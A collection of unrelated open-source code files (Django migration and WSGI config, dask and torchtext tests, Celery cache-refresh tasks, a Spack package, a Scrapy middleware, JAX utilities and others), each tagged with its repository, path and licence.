'message_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'rapidsms.contact': {
'Meta': {'object_name': 'Contact'},
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '6', 'blank': 'True'}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'statistics.statistic': {
'Meta': {'object_name': 'Statistic'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['statistics.StatisticGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'statistic_type': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
u'statistics.statisticgroup': {
'Meta': {'object_name': 'StatisticGroup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
}
}
complete_apps = ['clinics']
|
myvoice-nigeria/myvoice
|
myvoice/clinics/migrations/0013_auto__chg_field_visit_service.py
|
Python
|
bsd-2-clause
| 13,197
|
"""
WSGI config for parker project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "parker.settings")
application = get_wsgi_application()
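# A typical way to serve this module with a WSGI server such as gunicorn
# (a sketch, not part of the project's documentation):
#   gunicorn parker.wsgi:application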
|
banacer/parker.io
|
parker/parker/wsgi.py
|
Python
|
mit
| 389
|
import unittest
from torchtext.data.metrics import bleu_score
class TestTorchtext(unittest.TestCase):
def test_bleu_score(self):
candidate = [['I', 'love', 'Kaggle', 'Notebooks']]
refs = [[['Completely', 'Different']]]
self.assertEqual(0, bleu_score(candidate, refs))
|
Kaggle/docker-python
|
tests/test_torchtext.py
|
Python
|
apache-2.0
| 301
|
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
from pattern.web import Bing, plaintext
from pattern.en import parsetree
from pattern.search import Pattern
from pattern.db import Datasheet, pprint
# "X IS MORE IMPORTANT THAN Y"
# Here is a rough example of how to build a web miner.
# It mines comparative statements from Bing and stores the results in a table,
# which can be saved as a text file for further processing later on.
# Pattern matching also works with Sentence objects from the MBSP module.
# MBSP's parser is much more robust (but also slower).
#from MBSP import Sentence, parse
q = '"more important than"' # Bing search query
p = "NP VP? more important than NP" # Search pattern.
p = Pattern.fromstring(p)
d = Datasheet()
engine = Bing(license=None)
for i in range(1): # max=10
for result in engine.search(q, start=i+1, count=100, cached=True):
s = result.description
s = plaintext(s)
t = parsetree(s)
for m in p.search(t):
a = m.constituents(constraint=0)[-1] # Left NP.
b = m.constituents(constraint=5)[ 0] # Right NP.
d.append((
a.string.lower(),
b.string.lower()))
pprint(d)
print
print len(d), "results."
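# A minimal sketch of the "saved as a text file" step mentioned above, assuming
# pattern.db's Datasheet CSV export; the filename is hypothetical:
#d.save("comparisons.csv")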
|
krishna11888/ai
|
third_party/pattern/examples/04-search/09-web.py
|
Python
|
gpl-2.0
| 1,296
|
import FWCore.ParameterSet.Config as cms
process = cms.Process('slim')
process.source = cms.Source("PoolSource", fileNames=cms.untracked.vstring())
process.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(10))
process.output = cms.OutputModule("PoolOutputModule",
outputCommands=cms.untracked.vstring(
"drop *", "keep recoTracks_*_*_*"),
fileName=cms.untracked.string('output.root'),
)
process.out = cms.EndPath(process.output)
|
matz-e/lobster
|
examples/simple_pset.py
|
Python
|
mit
| 579
|
__author__ = 'M@Campbell'
from ooiservices.app import create_celery_app
from ooiservices.app.main.c2 import _compile_c2_toc
from flask.globals import current_app
import requests
from flask.ext.cache import Cache
CACHE_TIMEOUT = 172800  # 48 hours, in seconds
'''
Create the celery app, and configure it to talk to the redis broker.
Then initialize it.
'''
celery = create_celery_app('PRODUCTION')
celery.config_from_object('ooiservices.app.celeryconfig')
"""
Define the list of processes to run either on a heartbeat or simply waiting to be invoked on demand.
Caches created/utilized:
asset_list
asset_rds
c2_toc
stream_list
event_list
glider_tracks
cam_images
bad_asset_list
vocab_dict
vocab_codes
"""
from ooiservices.app.uframe.assetController import _compile_assets, _compile_bad_assets
from ooiservices.app.uframe.assetController import _compile_events
from ooiservices.app.uframe.controller import dfs_streams
from ooiservices.app.uframe.controller import _compile_glider_tracks
from ooiservices.app.uframe.controller import _compile_cam_images
from ooiservices.app.uframe.controller import _compile_large_format_files
from ooiservices.app.uframe.vocab import _compile_vocab
from ooiservices.app.main.alertsalarms_tools import _compile_asset_rds, get_assets_dict_from_list
@celery.task(name='tasks.compile_assets')
def compile_assets():
try:
print '\n debug - *** tasks - compile_assets()'
with current_app.test_request_context():
print "[+] Starting asset cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/%s' % ('assets')
payload = requests.get(url)
            if payload.status_code == 200:
# Cache assets_list
data = payload.json()
assets, asset_rds = _compile_assets(data)
if "error" not in assets:
cache.set('asset_list', assets, timeout=CACHE_TIMEOUT)
print "[+] Asset list cache reset"
# Cache assets_dict (based on success of _compile_assets returning assets)
assets_dict = get_assets_dict_from_list(assets)
if not assets_dict:
message = 'Warning: get_assets_dict_from_list returned empty assets_dict.'
print '\n debug -- message: ', message
current_app.logger.info(message)
if isinstance(assets_dict, dict):
cache.set('assets_dict', assets_dict, timeout=CACHE_TIMEOUT)
print "[+] Assets dictionary cache reset"
else:
print "[-] Error in Assets dictionary cache update"
else:
print "[-] Error in asset_list and asset_dict cache update"
# Cache assets_rd
if asset_rds:
cache.set('asset_rds', asset_rds, timeout=CACHE_TIMEOUT)
print "[+] Asset reference designators cache reset..."
else:
print "[-] Error in asset_rds cache update"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_assets exception: %s' % err.message
current_app.logger.warning(message)
raise Exception(message)
@celery.task(name='tasks.compile_asset_rds')
def compile_assets_rd():
try:
asset_rds = {}
with current_app.test_request_context():
print "[+] Starting asset reference designators cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
try:
asset_rds, _ = _compile_asset_rds()
except Exception as err:
                message = 'Error processing _compile_asset_rds: %s' % err.message
current_app.logger.warning(message)
if asset_rds:
cache.set('asset_rds', asset_rds, timeout=CACHE_TIMEOUT)
print "[+] Asset reference designators cache reset..."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_asset_rds exception: %s' % err.message
current_app.logger.warning(message)
raise Exception(message)
@celery.task(name='tasks.compile_streams')
def compile_streams():
try:
with current_app.test_request_context():
print "[+] Starting stream cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
streams = dfs_streams()
if "error" not in streams:
cache.set('stream_list', streams, timeout=CACHE_TIMEOUT)
print "[+] Streams cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_streams exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_events')
def compile_events():
try:
with current_app.test_request_context():
print "[+] Starting events cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/events'
payload = requests.get(url)
            if payload.status_code == 200:
data = payload.json()
events = _compile_events(data)
if "error" not in events:
cache.set('event_list', events, timeout=CACHE_TIMEOUT)
print "[+] Events cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
        message = 'compile_events exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_glider_tracks')
def compile_glider_tracks():
try:
with current_app.test_request_context():
print "[+] Starting glider tracks cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
glider_tracks = _compile_glider_tracks(True)
if "error" not in glider_tracks:
cache.set('glider_tracks', glider_tracks, timeout=CACHE_TIMEOUT)
print "[+] Glider tracks cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_glider_tracks exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_cam_images')
def compile_cam_images():
try:
with current_app.test_request_context():
print "[+] Starting cam images cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
cam_images = _compile_cam_images()
if "error" not in cam_images:
cache.set('cam_images', cam_images, timeout=CACHE_TIMEOUT)
print "[+] cam images cache reset."
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_cam_images exception: %s' % err.message
current_app.logger.warning(message)
"""
'get-large-format-files-every': {
'task': 'tasks.compile_large_format_files',
'schedule': crontab(minute=0, hour='*/12'),
'args': (),
},
"""
@celery.task(name='tasks.compile_large_format_files')
def compile_large_format_files():
try:
with current_app.test_request_context():
print "[+] Starting large format file cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
data = _compile_large_format_files()
if "error" not in data:
cache.set('large_format', data, timeout=CACHE_TIMEOUT)
print "[+] large format files updated."
else:
print "[-] Error in large file format update"
except Exception as err:
message = 'compile_large_format_files exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_c2_toc')
def compile_c2_toc():
try:
c2_toc = {}
with current_app.test_request_context():
print "[+] Starting c2 toc cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
try:
c2_toc = _compile_c2_toc()
except Exception as err:
                message = 'Error processing compile_c2_toc: %s' % err.message
current_app.logger.warning(message)
if c2_toc is not None:
cache.set('c2_toc', c2_toc, timeout=CACHE_TIMEOUT)
print "[+] C2 toc cache reset..."
else:
print "[-] Error in cache update"
except Exception as err:
        message = 'compile_c2_toc exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_bad_assets')
def compile_bad_assets():
try:
with current_app.test_request_context():
print "[+] Starting bad asset cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_ASSETS_URL'] + '/assets'
payload = requests.get(url)
            if payload.status_code == 200:
data = payload.json()
bad_assets = _compile_bad_assets(data)
if "error" not in bad_assets:
cache.set('bad_asset_list', bad_assets, timeout=CACHE_TIMEOUT)
print "[+] Bad asset cache reset"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_bad_assets exception: %s' % err.message
current_app.logger.warning(message)
@celery.task(name='tasks.compile_vocabulary')
def compile_vocabulary():
try:
with current_app.test_request_context():
print "[+] Starting vocabulary cache reset..."
cache = Cache(config={'CACHE_TYPE': 'redis', 'CACHE_REDIS_DB': 0})
cache.init_app(current_app)
url = current_app.config['UFRAME_VOCAB_URL'] + '/vocab'
payload = requests.get(url)
            if payload.status_code == 200:
data = payload.json()
vocab_dict, vocab_codes = _compile_vocab(data)
if "error" not in vocab_dict:
cache.set('vocab_dict', vocab_dict, timeout=CACHE_TIMEOUT)
                    cache.set('vocab_codes', vocab_codes, timeout=CACHE_TIMEOUT)
print "[+] Vocabulary cache reset"
else:
print "[-] Error in cache update"
except Exception as err:
message = 'compile_vocabulary exception: %s' % err.message
current_app.logger.warning(message)
|
oceanzus/ooi-ui-services
|
ooiservices/app/tasks.py
|
Python
|
apache-2.0
| 11,401
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Radius(A10BaseClass):
"""Class Description::
RADIUS type.
Class radius supports CRUD Operations and inherits from `common/A10BaseClass`.
    This class is the `"PARENT"` class for this module.
:param radius_username: {"description": "Specify the username", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
    :param radius_password_string: {"description": "Configure password, '' means empty password", "format": "password", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_encrypted: {"optional": true, "type": "encrypted", "description": "Do NOT use this option manually. (This is an A10 reserved keyword.) (The ENCRYPTED password string)", "format": "encrypted"}
:param radius_response_code: {"description": "Specify response code range (e.g. 2,4-7) (Format is xx,xx-xx (xx between [1, 13]))", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_expect: {"default": 0, "optional": true, "type": "number", "description": "Specify what you expect from the response message", "format": "flag"}
:param radius: {"default": 0, "optional": true, "type": "number", "description": "RADIUS type", "format": "flag"}
:param radius_secret: {"description": "Specify the shared secret of RADIUS server (Shared Crypto Key)", "format": "string-rlx", "minLength": 1, "optional": true, "maxLength": 31, "type": "string"}
:param radius_password: {"default": 0, "optional": true, "type": "number", "description": "Specify the user password", "format": "flag"}
:param radius_port: {"description": "Specify the RADIUS port, default is 1812 (Port number (default 1812))", "format": "number", "default": 1812, "optional": true, "maximum": 65534, "minimum": 1, "type": "number"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/health/monitor/{name}/method/radius`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "radius"
self.a10_url="/axapi/v3/health/monitor/{name}/method/radius"
self.DeviceProxy = ""
self.radius_username = ""
self.radius_password_string = ""
self.radius_encrypted = ""
self.radius_response_code = ""
self.radius_expect = ""
self.radius = ""
self.radius_secret = ""
self.radius_password = ""
self.radius_port = ""
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
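# Illustrative usage sketch (everything but the Radius class itself is an
# assumption, not part of this module): A10BaseClass subclasses are typically
# constructed with the schema fields above as keyword arguments and attached
# to a device proxy, e.g.
#   monitor_radius = Radius(radius_port=1812, radius_secret="shared-key")
#   monitor_radius.DeviceProxy = my_device_proxy  # see common/device_proxy.py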
|
amwelch/a10sdk-python
|
a10sdk/core/health/health_monitor_method_radius.py
|
Python
|
apache-2.0
| 2,951
|
username = 'admin'
pwd = '123321...'
dbname = 'Prueba'
host = '127.0.0.1'
port = '8069'
filepath = '/home/aphu/Downloads/'
filename = 'cantvnet.ods'
|
ITPS/oerp_gap_analysis_ITPS
|
utils/odf2gap/settings.py
|
Python
|
gpl-3.0
| 149
|
import numpy as np
import pandas as pd
import pandas.util.testing as tm
import dask.dataframe as dd
from dask.dataframe.utils import (shard_df_on_index, meta_nonempty, make_meta,
raise_on_meta_error)
import pytest
def test_shard_df_on_index():
df = pd.DataFrame({'x': [1, 2, 3, 4, 5, 6], 'y': list('abdabd')},
index=[10, 20, 30, 40, 50, 60])
result = list(shard_df_on_index(df, [20, 50]))
assert list(result[0].index) == [10]
assert list(result[1].index) == [20, 30, 40]
assert list(result[2].index) == [50, 60]
def test_make_meta():
df = pd.DataFrame({'a': [1, 2, 3], 'b': list('abc'), 'c': [1., 2., 3.]},
index=[10, 20, 30])
# Pandas dataframe
meta = make_meta(df)
assert len(meta) == 0
assert (meta.dtypes == df.dtypes).all()
assert isinstance(meta.index, type(df.index))
# Pandas series
meta = make_meta(df.a)
assert len(meta) == 0
assert meta.dtype == df.a.dtype
assert isinstance(meta.index, type(df.index))
# Pandas index
meta = make_meta(df.index)
assert isinstance(meta, type(df.index))
assert len(meta) == 0
# Dask object
ddf = dd.from_pandas(df, npartitions=2)
assert make_meta(ddf) is ddf._meta
# Dict
meta = make_meta({'a': 'i8', 'b': 'O', 'c': 'f8'})
assert isinstance(meta, pd.DataFrame)
assert len(meta) == 0
assert (meta.dtypes == df.dtypes).all()
assert isinstance(meta.index, pd.RangeIndex)
# Iterable
meta = make_meta([('a', 'i8'), ('c', 'f8'), ('b', 'O')])
assert (meta.columns == ['a', 'c', 'b']).all()
assert len(meta) == 0
assert (meta.dtypes == df.dtypes[meta.dtypes.index]).all()
assert isinstance(meta.index, pd.RangeIndex)
# Tuple
meta = make_meta(('a', 'i8'))
assert isinstance(meta, pd.Series)
assert len(meta) == 0
assert meta.dtype == 'i8'
assert meta.name == 'a'
# With index
meta = make_meta({'a': 'i8', 'b': 'i4'}, pd.Int64Index([1, 2], name='foo'))
assert isinstance(meta.index, pd.Int64Index)
assert len(meta.index) == 0
meta = make_meta(('a', 'i8'), pd.Int64Index([1, 2], name='foo'))
assert isinstance(meta.index, pd.Int64Index)
assert len(meta.index) == 0
# Numpy scalar
meta = make_meta(np.float64(1.0))
assert isinstance(meta, np.float64)
# Python scalar
meta = make_meta(1.0)
assert isinstance(meta, np.float64)
# Timestamp
x = pd.Timestamp(2000, 1, 1)
meta = make_meta(x)
assert meta is x
# Dtype expressions
meta = make_meta('i8')
assert isinstance(meta, np.int64)
meta = make_meta(float)
assert isinstance(meta, np.dtype(float).type)
meta = make_meta(np.dtype('bool'))
assert isinstance(meta, np.bool_)
assert pytest.raises(TypeError, lambda: make_meta(None))
def test_meta_nonempty():
df1 = pd.DataFrame({'A': pd.Categorical(['Alice', 'Bob', 'Carol']),
'B': list('abc'),
'C': 'bar',
'D': np.float32(1),
'E': np.int32(1),
'F': pd.Timestamp('2016-01-01'),
'G': pd.date_range('2016-01-01', periods=3,
tz='America/New_York'),
'H': pd.Timedelta('1 hours', 'ms'),
'I': np.void(b' ')},
columns=list('DCBAHGFEI'))
df2 = df1.iloc[0:0]
df3 = meta_nonempty(df2)
assert (df3.dtypes == df2.dtypes).all()
assert df3['A'][0] == 'Alice'
assert df3['B'][0] == 'foo'
assert df3['C'][0] == 'foo'
assert df3['D'][0] == np.float32(1)
assert df3['D'][0].dtype == 'f4'
assert df3['E'][0] == np.int32(1)
assert df3['E'][0].dtype == 'i4'
assert df3['F'][0] == pd.Timestamp('1970-01-01 00:00:00')
assert df3['G'][0] == pd.Timestamp('1970-01-01 00:00:00',
tz='America/New_York')
assert df3['H'][0] == pd.Timedelta('1', 'ms')
assert df3['I'][0] == 'foo'
s = meta_nonempty(df2['A'])
assert s.dtype == df2['A'].dtype
assert (df3['A'] == s).all()
def test_meta_duplicated():
df = pd.DataFrame(columns=['A', 'A', 'B'])
res = meta_nonempty(df)
exp = pd.DataFrame([['foo', 'foo', 'foo'],
['foo', 'foo', 'foo']],
index=['a', 'b'],
columns=['A', 'A', 'B'])
tm.assert_frame_equal(res, exp)
def test_meta_nonempty_index():
idx = pd.RangeIndex(1, name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.RangeIndex
assert res.name == idx.name
idx = pd.Int64Index([1], name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.Int64Index
assert res.name == idx.name
idx = pd.Index(['a'], name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.Index
assert res.name == idx.name
idx = pd.DatetimeIndex(['1970-01-01'], freq='d',
tz='America/New_York', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.DatetimeIndex
assert res.tz == idx.tz
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.PeriodIndex(['1970-01-01'], freq='d', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.PeriodIndex
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.TimedeltaIndex([np.timedelta64(1, 'D')], freq='d', name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.TimedeltaIndex
assert res.freq == idx.freq
assert res.name == idx.name
idx = pd.CategoricalIndex(['a'], ['a', 'b'], ordered=True, name='foo')
res = meta_nonempty(idx)
assert type(res) is pd.CategoricalIndex
assert (res.categories == idx.categories).all()
assert res.ordered == idx.ordered
assert res.name == idx.name
levels = [pd.Int64Index([1], name='a'),
pd.Float64Index([1.0], name='b')]
idx = pd.MultiIndex(levels=levels, labels=[[0], [0]], names=['a', 'b'])
res = meta_nonempty(idx)
assert type(res) is pd.MultiIndex
for idx1, idx2 in zip(idx.levels, res.levels):
assert type(idx1) is type(idx2)
assert idx1.name == idx2.name
assert res.names == idx.names
def test_meta_nonempty_scalar():
meta = meta_nonempty(np.float64(1.0))
assert isinstance(meta, np.float64)
x = pd.Timestamp(2000, 1, 1)
meta = meta_nonempty(x)
assert meta is x
def test_raise_on_meta_error():
try:
with raise_on_meta_error():
raise RuntimeError("Bad stuff")
except Exception as e:
assert e.args[0].startswith("Metadata inference failed.\n")
assert 'RuntimeError' in e.args[0]
try:
with raise_on_meta_error("myfunc"):
raise RuntimeError("Bad stuff")
except Exception as e:
assert e.args[0].startswith("Metadata inference failed in `myfunc`.\n")
assert 'RuntimeError' in e.args[0]
|
jeffery-do/Vizdoombot
|
doom/lib/python3.5/site-packages/dask/dataframe/tests/test_utils_dataframe.py
|
Python
|
mit
| 7,032
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class IsaacServer(CMakePackage):
"""In Situ Animation of Accelerated Computations: Server"""
homepage = "http://computationalradiationphysics.github.io/isaac/"
url = "https://github.com/ComputationalRadiationPhysics/isaac/archive/v1.3.0.tar.gz"
maintainers = ['ax3l']
version('develop', branch='dev',
git='https://github.com/ComputationalRadiationPhysics/isaac.git')
version('master', branch='master',
git='https://github.com/ComputationalRadiationPhysics/isaac.git')
version('1.3.3', '7aeebaf0c5a77e2cb9bea066750e369b')
version('1.3.2', 'c557daa74de52fd79e734c9758fca38b')
version('1.3.1', '7fe075f9af68d05355eaba0e224f20ca')
version('1.3.0', 'c8a794da9bb998ef0e75449bfece1a12')
# variant('gstreamer', default=False, description= \
# 'Support for RTP streams, e.g. to Twitch or Youtube')
depends_on('cmake@3.3:', type='build')
depends_on('jpeg', type='link')
depends_on('jansson', type='link')
depends_on('boost@1.56.0:', type='link')
depends_on('libwebsockets@2.1.1:', type='link')
# depends_on('gstreamer@1.0', when='+gstreamer')
# Until the pull request is merged: https://github.com/ComputationalRadiationPhysics/isaac/pull/70
patch('jpeg.patch', when='@:1.3.1')
root_cmakelists_dir = 'server'
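# Illustrative usage (assuming a standard Spack setup): a concrete version of
# this package can be built with
#   spack install isaac-server@1.3.3
# which pulls in the dependencies constrained above.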
|
tmerrick1/spack
|
var/spack/repos/builtin/packages/isaac-server/package.py
|
Python
|
lgpl-2.1
| 2,583
|
# -*- coding: utf-8 -*-
###############################################################################
#
# GetViewCount
# Returns the ticket count for a single view.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class GetViewCount(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the GetViewCount Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(GetViewCount, self).__init__(temboo_session, '/Library/Zendesk/Views/GetViewCount')
def new_input_set(self):
return GetViewCountInputSet()
def _make_result_set(self, result, path):
return GetViewCountResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return GetViewCountChoreographyExecution(session, exec_id, path)
class GetViewCountInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the GetViewCount
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_Email(self, value):
"""
Set the value of the Email input for this Choreo. ((required, string) The email address you use to login to your Zendesk account.)
"""
super(GetViewCountInputSet, self)._set_input('Email', value)
def set_ID(self, value):
"""
Set the value of the ID input for this Choreo. ((conditional, string) Retrieve a view count for the ID of the specified view.)
"""
super(GetViewCountInputSet, self)._set_input('ID', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((required, password) Your Zendesk password.)
"""
super(GetViewCountInputSet, self)._set_input('Password', value)
def set_Server(self, value):
"""
Set the value of the Server input for this Choreo. ((required, string) Your Zendesk domain and subdomain (e.g., temboocare.zendesk.com).)
"""
super(GetViewCountInputSet, self)._set_input('Server', value)
class GetViewCountResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the GetViewCount Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Zendesk.)
"""
return self._output.get('Response', None)
class GetViewCountChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return GetViewCountResultSet(response, path)
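# Illustrative usage sketch (the session setup and values are assumptions, not
# part of this file): a Choreo is normally driven through a TembooSession, e.g.
#   choreo = GetViewCount(temboo_session)
#   inputs = choreo.new_input_set()
#   inputs.set_Email("me@example.com")
#   inputs.set_Password("...")
#   inputs.set_Server("example.zendesk.com")
#   inputs.set_ID("12345")
#   results = choreo.execute_with_results(inputs)
#   print(results.get_Response())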
|
jordanemedlock/psychtruths
|
temboo/core/Library/Zendesk/Views/GetViewCount.py
|
Python
|
apache-2.0
| 3,674
|
"""Set User-Agent header per spider or use a default value from settings"""
from scrapy import signals
class UserAgentMiddleware(object):
"""This middleware allows spiders to override the user_agent"""
def __init__(self, user_agent='Scrapy'):
self.user_agent = user_agent
@classmethod
def from_crawler(cls, crawler):
o = cls(crawler.settings['USER_AGENT'])
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
return o
def spider_opened(self, spider):
self.user_agent = getattr(spider, 'user_agent', self.user_agent)
def process_request(self, request, spider):
if self.user_agent:
request.headers.setdefault(b'User-Agent', self.user_agent)
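# Usage note: a spider can override the default simply by defining a
# `user_agent` attribute, which spider_opened() above picks up, e.g.
#   class MySpider(scrapy.Spider):
#       name = "my_spider"  # illustrative name
#       user_agent = "MyCrawler/1.0 (+https://example.com/bot)"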
|
agreen/scrapy
|
scrapy/downloadermiddlewares/useragent.py
|
Python
|
bsd-3-clause
| 749
|
import pkgutil
class NoQuestionInModuleException(Exception): pass
# Define a dict to add all of our finds to.
categories = {}
def load(path):
# Path needs to be a list in order for the following calls to work.
if type(path) != list: path = [path]
# Walk the directory.
for loader, name, ispkg in pkgutil.walk_packages(path):
module = loader.find_module(name).load_module(name)
# Try to find the module's defined class, and add it to the
# list.
qname = name + "Question"
try:
if qname in dir(module):
categories[qname.lower()] = module.__dict__[qname]
else:
raise NoQuestionInModuleException("No class %s" % qname)
except Exception as e:
print("Skipping module {}: {}".format(name, e))
# Load all of the questions in this path.
load(__path__)
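# Layout note (module/class names are illustrative): load() expects each module
# in this package to define a class named "<ModuleName>Question", so a file
# multiplechoice.py would provide
#   class multiplechoiceQuestion:
#       ...
# and be exposed here as categories["multiplechoicequestion"].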
|
alexander-bauer/swirlypy
|
swirlypy/questions/__init__.py
|
Python
|
gpl-3.0
| 881
|
# Copyright 2020 DeepMind Technologies Limited.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities related to multi-device operations."""
import collections
from typing import Any, Mapping, Optional, Sequence, Tuple, TypeVar, Union
import dataclasses
import jax
from jax import core
from jax import lax
import jax.numpy as jnp
from jax.scipy import linalg
import jax.tree_util as tree_util
T = TypeVar("T")
def wrap_if_pmap(p_func):
def p_func_if_pmap(obj, axis_name):
try:
core.axis_frame(axis_name)
return p_func(obj, axis_name)
except NameError:
return obj
return p_func_if_pmap
pmean_if_pmap = wrap_if_pmap(lax.pmean)
psum_if_pmap = wrap_if_pmap(lax.psum)
